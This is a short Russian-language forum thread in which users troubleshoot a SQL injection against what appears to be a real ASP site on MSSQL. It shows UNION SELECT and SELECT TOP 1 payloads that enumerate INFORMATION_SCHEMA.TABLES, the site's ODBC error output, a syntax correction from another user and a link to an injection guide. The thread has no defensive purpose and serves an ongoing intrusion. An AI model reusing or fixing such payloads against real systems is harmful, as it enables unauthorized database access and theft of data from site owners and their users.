На сайте SQL инъекция (MSSQL). Подбираю столбцы, все вроде нормально. После запроса http://.........asp?partId=5&infoId...TABLE_NAME,4+from+INFORMATION_SCHEMA.TABLES-- выдает: Microsoft OLE DB Provider for ODBC Drivers ошибка '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'TOP'. /_inc/engines/ssis/engine.asp, line 100 Как с этим бороться?
неверный синтаксис union select TABLE_NAME from INFORMATION_SCHEMA.TABLES-- Читай статью http://injection.rulezz.ru/MSSQL-ASP-Injection.html
вопрос еще почему при выполнении подзапроса (SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES) пишет ошибку Incorrect syntax near the keyword 'top'. все до вложеного правильно.. по моему те же грабли... как их убрать??